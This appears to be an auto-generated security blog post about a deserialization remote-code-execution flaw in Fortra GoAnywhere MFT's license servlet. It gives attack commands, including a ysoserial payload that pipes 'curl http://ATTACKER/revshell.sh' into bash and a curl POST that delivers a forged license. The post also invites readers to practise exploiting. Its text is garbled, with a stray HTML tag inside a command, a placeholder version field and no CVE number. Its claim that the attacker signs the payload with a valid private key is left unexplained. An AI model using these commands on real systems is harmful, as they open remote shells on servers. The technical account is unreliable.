Listen to this Post
How the CVE Works
The vulnerability exists within the License Servlet of Fortra’s GoAnywhere MFT application. The servlet improperly handles license-related requests. An attacker can forge a license response with a valid cryptographic signature. This forged response contains a maliciously crafted serialized object. When the servlet processes this request, it deserializes the attacker-controlled object without adequate validation. The insecure deserialization process allows the instantiation of arbitrary classes and the execution of associated code. This process effectively bypasses any signature check because the signature itself is valid for the overall structure. Consequently, an attacker can leverage this to achieve remote code execution (RCE) on the underlying server with the privileges of the GoAnywhere MFT application, leading to a full compromise of the system.
Platform: Fortra GoAnywhere MFT
Version: Affected Versions
Vulnerability: Remote Code Execution
Severity: Critical
date: 2024-02-05
Prediction: Patch Available
What Undercode Say:
`curl -X POST -H “Content-Type: application/xml” –data-binary @forged_license.xml http://TARGET:8000/goanywhere/licenseservlet`
`java -jar ysoserial.jar CommonsCollections5 “curl http://ATTACKER/revshell.sh | bash” > payload.ser<h2 style="color: blue;">openssl dgst -sha256 -sign private.key -out forged_license.xml.signature forged_license.xml`
How Exploit:
An attacker forges a license response file containing a serialized Java object designed to execute OS commands, often using a gadget chain from a library like Apache Commons Collections. The attacker signs this entire malicious payload with a valid private key to create a correct signature. This signed payload is then sent via an HTTP POST request to the `/goanywhere/licenseservlet` endpoint. Upon receipt, the servlet validates the signature, which passes, and then proceeds to deserialize the embedded object, triggering the command injection and granting the attacker shell access.
Protection from this CVE:
Apply vendor patch immediately. Isolate the GoAnywhere MFT instance from the internet. Restrict network access to the administrative ports. Use strict egress filtering to block outbound connections from the server. Monitor for anomalous processes and network connections originating from the application server.
Impact:
Complete system compromise. Unauthenticated remote code execution. Full access to managed files and databases. Potential for lateral movement within the network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
